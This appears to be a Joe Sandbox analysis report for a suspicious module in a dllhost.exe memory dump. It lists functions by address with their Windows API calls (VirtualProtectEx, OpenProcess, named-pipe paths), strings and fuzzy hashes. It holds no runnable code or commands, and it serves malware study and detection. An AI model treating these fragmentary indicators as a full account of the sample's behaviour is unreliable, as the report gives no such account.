Instruction Fuzzy Hash: 11D06730659640D5EE0A7B55ECE47E42271ABA4F01FC4165DE70F013A4DE2C85D993E0

Function 0000017C6DD72C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000017C6DD72CAD
TlsGetValue.KERNEL32 ref: 0000017C6DD72CBC
TlsGetValue.KERNEL32 ref: 0000017C6DD72CCB
TlsSetValue.KERNEL32 ref: 0000017C6DD72E0F
TlsSetValue.KERNEL32 ref: 0000017C6DD72E1E
TlsSetValue.KERNEL32 ref: 0000017C6DD72E2D

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: 5d583cce69cc50d4f0e355e5830df72f460481bbcb4d3eeaeeab1941a2a0ba3a
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: D551B13520868087EB35EB16E88069AB7B4F788B88F50411DBF4E43B54DB39C9C6CBD0

Function 0000017C6DD72AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000017C6DD72AE1
TlsGetValue.KERNEL32 ref: 0000017C6DD72AF0
TlsGetValue.KERNEL32 ref: 0000017C6DD72AFF
TlsSetValue.KERNEL32 ref: 0000017C6DD72C3B
TlsSetValue.KERNEL32 ref: 0000017C6DD72C4A
TlsSetValue.KERNEL32 ref: 0000017C6DD72C59

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: b37ff17b52ace91dad0205cbcff8dd6f439ed3a03784214cb353fcef159a435c
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 5A5192352186818BEB34EF16A8806AAB7B4F384B84F50415DEF4E43758DF39D9C6CB90

Function 0000017C6DD75E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000017C6DD75E66

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 1d5a0fb19a357bc5da5ec4cb39e26b80e5aa499507de602fffe30c9fbc45b794
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: EE61C87652DB4486EB60EB15E49036AB7B0F388788F100159FB8D47BA8DB7DC5C4CB91

Function 0000017C6DD73EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000017C6DD73A5B), ref: 0000017C6DD73EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000017C6DD73A5B), ref: 0000017C6DD73F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000017C6DD73A5B), ref: 0000017C6DD73F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000017C6DD73A5B), ref: 0000017C6DD73F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000017C6DD73A5B), ref: 0000017C6DD73F68

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: d7dddea50c3efbf11adc2fceea1dcab2bb9cd0def0a6405d477c801de075c3bc
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: AC11423660974093EF25AB21E48469AA7B0FB45B84F44012AEF5D03798EB7DC9D8C7D4

Function 0000017C6DD78CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000017C6DD78CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000017C6DD78D62
RtlUnwindEx.NTDLL ref: 0000017C6DD78DBC

Strings

csm, xrefs: 0000017C6DD78D49

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 80345bdb2c88e1fb11a5445c5ff598060cc90306e893f22ca79c92cfc1fc0e9d
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 2951C0323196008AEF58EB65E484BAC37B2E354B98F548169FB4E47788DB79C8C1C790

Function 0000017C6DD7A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 0000017C6DD7A75B
_CallSETranslator.LIBVCRUNTIME ref: 0000017C6DD7A7A7

Strings

MOC, xrefs: 0000017C6DD7A76F
RCC, xrefs: 0000017C6DD7A777

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 6ebae43ccba30faf210a1d6ed2121feee805390488258ef41c53080ea961fd90
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 88618C32508BC485EB21AF25E480BDAB7B0F785B98F44525AFB9C13B99DB78C1D0CB50

Function 0000017C6DD7AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000017C6DD7AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000017C6DD7ABBC

Strings

csm, xrefs: 0000017C6DD7AC0E
csm, xrefs: 0000017C6DD7AAF6

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: b85a46891ca13ff65f0f0a1d06c19057bac811176374cb755800127e546ad10b
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 68519E362082809BEF74AF22D984B9877B0F354B84F14619AEB9D47BD5CB38D4E0C791

Function 0000017C6DD82660 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000017C6DD82778
GetLastError.KERNEL32 ref: 0000017C6DD8279D

Strings

\t9"1, xrefs: 0000017C6DD8267F
U, xrefs: 0000017C6DD82722

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U$\t9"1
API String ID: 442123175-2242669097
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 24e0c1333eac9105370902af0790174915e0fe580699feb53542fbe6b2e97b36
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 1941D632619A8086EB21EF26E8847E9B7B4F348784F504129FF4D87758EB38C4C1C7A0

Function 0000017C6DD73950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 0000017C6DD73972
StrStrW.SHLWAPI ref: 0000017C6DD73990
StrToIntW.SHLWAPI ref: 0000017C6DD739B7

Part of subcall function 0000017C6DD71A30: OpenProcess.KERNEL32 ref: 0000017C6DD71A56
Part of subcall function 0000017C6DD71A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000017C6DD71A74
Part of subcall function 0000017C6DD71A30: PathFindFileNameW.SHLWAPI ref: 0000017C6DD71A83
Part of subcall function 0000017C6DD71A30: lstrlenW.KERNEL32 ref: 0000017C6DD71A8F
Part of subcall function 0000017C6DD71A30: StrCpyW.SHLWAPI ref: 0000017C6DD71AA2
Part of subcall function 0000017C6DD71A30: CloseHandle.KERNEL32 ref: 0000017C6DD71AB0

Part of subcall function 0000017C6DD73F88: StrCmpNIW.SHLWAPI(?,?,?,0000017C6DD7272F), ref: 0000017C6DD73FA0

Strings

pid_, xrefs: 0000017C6DD73968

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 633b9dff9f89125f02c5721d020b4e0745a32e2679ecbf81f0621d2fd7834ca3
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 30118E31318B8192EF21BB25E8813DA63B4F788780F804569BF5D83794EF68C9C5C7A0

Function 0000017C6DD714A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000017C6DD714C6
HeapFree.KERNEL32 ref: 0000017C6DD714D5
GetProcessHeap.KERNEL32 ref: 0000017C6DD714E2
HeapFree.KERNEL32 ref: 0000017C6DD714F1
GetProcessHeap.KERNEL32 ref: 0000017C6DD71501

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 64ad43b1cb82423bf97892969d378a2e5332aa3f4b855cc6ab43c2a680ef8b91
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 77015732614A80DAEB15EF66A8841A977B0F788F81B494029EB4E43728DE34D0D1C790

Function 0000017C6DD828F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000017C6DD828DF), ref: 0000017C6DD82A12

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: d347dcc0b6ad053042282627af52433ce3f4fd8773b1876fd7a0050ae48a238b
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 9891AC3261865199FF72AF6698903ED2BB0B754B8CF44410EEF4E67B89DA34D4C5C3A0

Function 0000017C6DD7E8E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 197COMMON

Download Yara Rule

APIs

Part of subcall function 0000017C6DD7E22C: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,0000017C6DD7E578), ref: 0000017C6DD7E256

IsValidCodePage.KERNEL32(?,?,?,00000001,?,00000000,?,0000017C6DD7E6A9), ref: 0000017C6DD7E95B
GetCPInfo.KERNEL32(?,?,?,00000001,?,00000000,?,0000017C6DD7E6A9), ref: 0000017C6DD7E99F

Strings

\t9"1, xrefs: 0000017C6DD7E8F6

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: CodeInfoPageValid
String ID: \t9"1
API String ID: 546120528-2818780629
Opcode ID: 368bb57caff044830bbb836d0107136edbd08920f66937ca735bdc2bbc321278
Instruction ID: e68a0cc44ed8a1cca31643dc150206dd023388c431b8c014acf1302371d8972b
Opcode Fuzzy Hash: 368bb57caff044830bbb836d0107136edbd08920f66937ca735bdc2bbc321278
Instruction Fuzzy Hash: 7D81A1B260C69186EF75AF25D0803E9BBB1F344740F58415AE78E87791DA39D5C183E0

Function 0000017C6DD727E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000017C6DD728CC
StrCpyW.SHLWAPI ref: 0000017C6DD728E5

Part of subcall function 0000017C6DD73F88: StrCmpNIW.SHLWAPI(?,?,?,0000017C6DD7272F), ref: 0000017C6DD73FA0

Strings

\\.\pipe\, xrefs: 0000017C6DD728D7

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 0bd27f7ca993c2d97871c642f52d2c7e33db8b0024e62d645df2e8f73469d51a
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 7C71933660878251EF75AE26D8D43EA6BB4F385788F44005AEF4D43B89DA35C6C08790

Function 0000017C6DD725DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000017C6DD726C2
StrCpyW.SHLWAPI ref: 0000017C6DD726D9

Strings

\\.\pipe\, xrefs: 0000017C6DD726CD

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: c3a42eb6e6f2226626f79d63cc2281fca2daeb1e8978fa476f02fadc0431ca94
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: C151C13620C7C192EE34AE29A5D43EA6A75F384794F54006EEF5D43B89DA39C4C487A0

Function 0000017C6DD7E344 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 0000017C6DD7E394

Strings

\t9"1, xrefs: 0000017C6DD7E35E
, xrefs: 0000017C6DD7E3D7

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: Info
String ID: $\t9"1
API String ID: 1807457897-3203091125
Opcode ID: f3a1ccdfc844010f6d6384e8b727e223aafffbf012ce67cb554655a4b1010233
Instruction ID: 65fba2b4e78c4edcf428cbdf4f4273049e68285e2276b90eda211b14bb98fcee
Opcode Fuzzy Hash: f3a1ccdfc844010f6d6384e8b727e223aafffbf012ce67cb554655a4b1010233
Instruction Fuzzy Hash: ED518D7261C6C08AEB219F25E0843DE7BB4F348748F54426AE78D87B85DB78C1D5CBA0

Function 0000017C6DD82544 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000017C6DD82610
GetLastError.KERNEL32 ref: 0000017C6DD8262C

Strings

\t9"1, xrefs: 0000017C6DD8255F

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: \t9"1
API String ID: 442123175-2818780629
Opcode ID: 9aaf26f040ad1ec26527c6482f0f95a02a03d15fd00723e3f37292bb076685c6
Instruction ID: 99c91ba815dd917f0fc854d9257a00be9796f7eddb93241e14ed99217845ba83
Opcode Fuzzy Hash: 9aaf26f040ad1ec26527c6482f0f95a02a03d15fd00723e3f37292bb076685c6
Instruction Fuzzy Hash: F831BF72719A8086DF61AF15E8843D9B7B0F758788F844029FB4E87754EB38C5D1CB50

Function 0000017C6DD7DF38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 0000017C6DD7DF73
GetLastError.KERNEL32 ref: 0000017C6DD7DF7D

Strings

\t9"1, xrefs: 0000017C6DD7DF52

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: \t9"1
API String ID: 2776309574-2818780629
Opcode ID: afd8fe68969716b5af19fc5389df831274dd0723d0692592c9853f2af0341627
Instruction ID: 6408e4ca5f4df4ea061ca43f760253d53d68b43277376e155def3152b5fb2846
Opcode Fuzzy Hash: afd8fe68969716b5af19fc5389df831274dd0723d0692592c9853f2af0341627
Instruction Fuzzy Hash: 23318232218B818AEB70AB25E4843DE77B4F385794F540159EBCC87B98DB38C5C1CB91

Function 0000017C6DD79178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

